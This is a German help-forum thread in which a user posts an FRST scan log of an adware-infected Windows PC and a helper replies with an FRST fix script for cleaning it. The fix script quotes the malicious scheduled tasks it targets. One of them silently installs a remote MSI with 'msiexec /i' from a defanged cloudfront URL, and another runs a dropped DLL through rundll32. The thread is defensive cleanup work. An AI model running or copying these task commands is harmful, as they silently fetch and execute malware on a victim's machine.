2016-07-16 12:43 - 2016-07-16 23:56 - 00813056 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http\bin\NodeRT_Windows_Web_Http.node
2016-07-16 12:43 - 2016-07-16 23:56 - 00963584 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.headers\bin\NodeRT_Windows_Web_Http_Headers.no de
2016-07-16 12:43 - 2016-07-16 23:56 - 00249344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.filters\bin\NodeRT_Windows_Web_Http_Filters.no de
2016-07-16 12:43 - 2016-07-16 23:56 - 00572416 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.storage.streams\bin\NodeRT_Windows_Storage_Streams.node
2016-07-16 12:43 - 2016-07-16 23:56 - 00403968 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.foundation\bin\NodeRT_Windows_Foundation.node
2016-07-16 12:43 - 2016-07-16 23:56 - 00183296 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\nodert-buffer-utils\bin\NodeRT_Buffer_Utils.node
2016-07-16 12:43 - 2016-07-16 23:56 - 00288256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.cortana.pal\bin\NodeRT_Windows_Cortana_PAL.node
2017-02-06 11:43 - 2017-02-06 11:44 - 00073728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-02-06 11:43 - 2017-02-06 11:44 - 00179712 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-02-06 11:43 - 2017-02-06 11:44 - 42895872 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-02-06 11:43 - 2017-02-06 11:44 - 02215424 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\roottools.dll
2017-02-12 22:13 - 2017-02-12 22:13 - 00154624 _____ () c:\program files (x86)\plidaing\konoghstuqtainmodule.dll
2016-09-23 02:40 - 2017-02-13 20:45 - 00028672 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2016-09-23 02:40 - 2013-07-04 02:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2016-10-22 12:18 - 2016-10-22 12:18 - 02493440 _____ () C:\Program Files (x86)\Origin\libGLESv2.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-13 07:34 - 2017-01-20 19:38 - 64245184 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-13 07:34 - 2017-01-20 14:36 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-13 07:34 - 2017-01-20 14:36 - 02808888 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00384568 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00537656 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00468024 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 01066552 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2017-02-03 17:12 - 2017-01-20 14:36 - 01014840 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSDKAPINode.node

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2017-02-12 22:14 - 00000833 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "x5o3Yv2CQw.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "zC6b23GTAV.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "GWH9N93A6U"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JLAWFPN14I"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "XN55R0BYZD"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "LAMMPX75X6"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JG5BHCSAVC"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [UDP Query User{89490B79-F7C4-449C-AEA9-7C67ECB9FB5B}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{4A234969-EDBC-4530-B847-6329B46AA77A}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{F111BCF2-9CBB-4742-9CFC-D23879181430}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{3DC38285-63C7-451A-AE42-5DB7E25FE3FB}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [{C681929D-CAC5-43C1-8926-0E72B114FE4B}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{51B20E6F-4269-4C1F-BCCF-4AE409514E34}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{1EFF0FAC-0E9E-4E91-809B-2BBDDEF8994B}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{51F45EC0-BB2A-4881-81A4-39592A9F1F50}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{592ABD94-223B-4029-ADAD-C4B4FCB9D173}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{E1123DD8-DF30-4BAF-95D0-0CD324E434C5}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{E755C63D-D036-4730-806E-F025F68F5F83}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{EA936888-D98A-4A6D-8DD0-3AD3C9E0A3BE}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{B23562F6-99F7-40EB-85CA-F7BC0A871F26}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{B9E938BA-EF39-4E7E-85AB-3E80B71AFF38}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{DC1A5F54-BD72-48BE-9E47-2743168046A0}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{552C0333-744D-467D-9BBA-8B77D85239E4}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{D8E7A1C6-22AF-42A9-8E8C-58F55E9CE22C}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{E0D9EE58-C0E4-48F0-BDC9-947A2AB5CA23}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4ED0602B-CF04-4814-BAC6-89B59E81BAAC}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{9D55ECBB-5F7C-4C93-8581-D680E589C6CE}] => C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{ADBDAF4A-07E9-49DB-9143-E96D557CF9D2}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{CB3BDEFE-0BF5-4061-94BB-7D2369AC1E55}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{DD54EA2F-A6AF-4273-947B-D0C663DE40BC}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{869331B2-5268-469F-A83F-7D7CBAC32BA4}] => C:\Windows\System32\rundll32.exe
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015

==================== Wiederherstellungspunkte =========================

25-01-2017 13:43:30 Windows Update
03-02-2017 17:33:02 Geplanter Prüfpunkt
09-02-2017 13:37:47 Windows Update
13-02-2017 20:00:44 Revo Uninstaller's restore point - AppTrailers - AppTrailers for Desktop
13-02-2017 20:01:09 Revo Uninstaller's restore point - AppTrailers - AppTrailers for Desktop
13-02-2017 20:01:36 Revo Uninstaller's restore point - BeCleaner version 1.0
13-02-2017 20:01:57 Revo Uninstaller's restore point - HDWallPaper 1.0
13-02-2017 20:02:41 Revo Uninstaller's restore point - MyMemory
13-02-2017 20:03:19 Revo Uninstaller's restore point - MyMemory
13-02-2017 20:03:37 Revo Uninstaller's restore point - OtherSearch
13-02-2017 20:03:56 Revo Uninstaller's restore point - pccleanplus
13-02-2017 20:04:22 Revo Uninstaller's restore point - Search module
13-02-2017 20:04:57 Revo Uninstaller's restore point - Social2Search
13-02-2017 20:05:16 Revo Uninstaller's restore point - Social2Search
13-02-2017 20:06:10 Revo Uninstaller's restore point - youndoo - Uninstall
13-02-2017 20:06:27 Revo Uninstaller's restore point - trotux - Uninstall
13-02-2017 20:08:26 Revo Uninstaller's restore point - Malwarebytes Anti-Malware Version 2.2.1.1043
13-02-2017 20:09:06 Revo Uninstaller's restore point - youndoo - Uninstall
13-02-2017 20:09:29 Revo Uninstaller's restore point - BrowserAir
13-02-2017 20:11:04 Revo Uninstaller's restore point - Search module
13-02-2017 20:11:46 Revo Uninstaller's restore point - MyMemory

==================== Fehlerhafte Geräte im Gerätemanager =============

==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/13/2017 08:45:22 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Barbara-PC)
Description: Bei der Aktivierung der App „Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (02/13/2017 08:38:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: MicrosoftEdge.exe, Version: 11.0.14393.693, Zeitstempel: 0x585a26c4
Name des fehlerhaften Moduls: CoreUIComponents.dll, Version: 0.0.0.0, Zeitstempel: 0x584a72ab
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000072fda
ID des fehlerhaften Prozesses: 0x8c8
Startzeit der fehlerhaften Anwendung: 0x01d28628cb26d4e3
Pfad der fehlerhaften Anwendung: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\system32\CoreUIComponents.dll
Berichtskennung: a4960bf2-14ed-4555-a40e-1413ed284da4
Vollständiger Name des fehlerhaften Pakets: Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: MicrosoftEdge

Error: (02/13/2017 08:13:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_WinSnare, Version: 10.0.14393.0, Zeitstempel: 0x57899b1c
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.14393.479, Zeitstempel: 0x5825887f
Ausnahmecode: 0xc0000008
Fehleroffset: 0x00000000000a9d2a
ID des fehlerhaften Prozesses: 0x1a50
Startzeit der fehlerhaften Anwendung: 0x01d2862d3d21a06a
Pfad der fehlerhaften Anwendung: C:\Windows\System32\svchost.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: 0546e240-cebe-4c86-818c-9cec689d6235
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (02/13/2017 08:11:47 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:11:04 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:09:30 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:09:07 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:08:26 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:06:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:06:10 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Systemfehler:
=============
Error: (02/13/2017 08:45:47 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (02/13/2017 08:45:43 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.

Error: (02/13/2017 08:45:22 PM) (Source: DCOM) (EventID: 10010) (User: Barbara-PC)
Description: Der Server "MicrosoftEdge.AppX9zvsr9qeth9e9a03yr0g7rpdrcrwgn5r.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (02/13/2017 08:45:17 PM) (Source: DCOM) (EventID: 10010) (User: Barbara-PC)
Description: Der Server "{0002DF02-0000-0000-C000-000000000046}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (02/13/2017 08:39:06 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (02/13/2017 08:39:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "xeduqivo" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (02/13/2017 08:39:03 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.

Error: (02/13/2017 08:38:42 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler:
Es wird bereits eine Instanz des Dienstes ausgeführt.

Error: (02/13/2017 08:38:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Message Queuing" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/13/2017 08:38:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Search Module Update" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

CodeIntegrity:
===================================
Date: 2017-02-13 20:42:44.656
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 20:42:44.656
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 20:40:18.579
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 19:15:20.412
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 19:15:17.050
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 19:15:11.930
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-12 22:25:39.778
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:37:00.860
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:30:05.983
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:29:50.519
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Xeon(R) CPU E3-1231 v3 @ 3.40GHz
Prozentuale Nutzung des RAM: 12%
Installierter physikalischer RAM: 16328.44 MB
Verfügbarer physikalischer RAM: 14241.62 MB
Summe virtueller Speicher: 32712.44 MB
Verfügbarer virtueller Speicher: 30588.39 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.35 GB) (Free:163.18 GB) NTFS
Drive d: (Daten) (Fixed) (Total:1862.89 GB) (Free:1789.88 GB) NTFS
Drive e: (Disc2) (CDROM) (Total:7.88 GB) (Free:0 GB) UDF

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 6CF6904B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================

Bei mir meldet jetzt Malwarebytes dauernd, dass es schädliche Internetseiten blockiert. Im Edge Browser poppen auch ständig Tabs mit Werbung auf.

Viele Grüße
Barbara

burningice · 13.02.2017, 21:19

Schritt: 1
Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:

ATTFilter

closeprocesses:
emptytemp: 

Task: {82DEE0EB-4548-49CE-881E-34A0D3C76D71} - \OneDrive Standalone Update Task v2 -> Keine Datei <==== ACHTUNG
Task: {8FEDA5A7-F6AE-459A-895E-3269F9B87DC5} - System32\Tasks\108l42A89c7603 => Rundll32.exe "C:\ProgramData\108l42A89c7603\108l42A89c7603.dll",lAcqxFh <==== ACHTUNG
Task: {BF709A57-E750-4DDD-B582-32B6C514637F} - \{7D0D0E47-797A-7F7A-7D11-7D797E041105} -> Keine Datei <==== ACHTUNG
Task: {E3BEDC84-1FC4-462C-B3DA-C04B65228E1C} - System32\Tasks\Pregehabering => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SamsungXSSDX840XEVOX250GB_S1DBNSBF263398Y&amp;v=2017212 /q
Task: {ED9678EB-B078-4A94-A29D-89D8596AB858} - System32\Tasks\Atikationbogot System => C:\Program Files (x86)\Plidaing\drerzes.exe [2017-02-12] (Glarysoft Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [ZJy9zt07Me] => C:\Program Files\PDR238V39I\22XHB7149.exe [370176 2017-02-13] ()
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [HGFI7viJwx] => C:\Program Files\XPQ0UG79CA\XPQ0UG79C.exe [370176 2017-02-13] ()
ShellExecuteHooks: Kein Name - {12BEB57E-ECD3-11E6-A98A-64006A5CFC23} - C:\Users\Barbara\AppData\Roaming\Zrshfcit\Griotain.dll -> Keine Datei
R2 Dalidom; C:\Program Files (x86)\Plidaing\Konoghstuqtainmodule.dll [154624 2017-02-12] () [Datei ist nicht signiert]
S2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]
S1 cvjjfjaa; \??\C:\WINDOWS\system32\drivers\cvjjfjaa.sys [X]
2017-02-13 20:19 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\XPQ0UG79CA
2017-02-13 20:13 - 2017-02-13 20:13 - 00000000 ____D C:\Program Files (x86)\pfqv62f8
2017-02-13 19:19 - 2017-02-13 19:19 - 00000000 ____D C:\Program Files\PDR238V39I
2017-02-12 22:16 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\8K5F5GX6AI
2017-02-12 22:15 - 2017-02-13 20:03 - 00000000 ____D C:\Program Files (x86)\vpF0TnTYqt
2017-02-12 22:14 - 2017-02-13 20:39 - 00000000 ____D C:\Program Files (x86)\Druciy
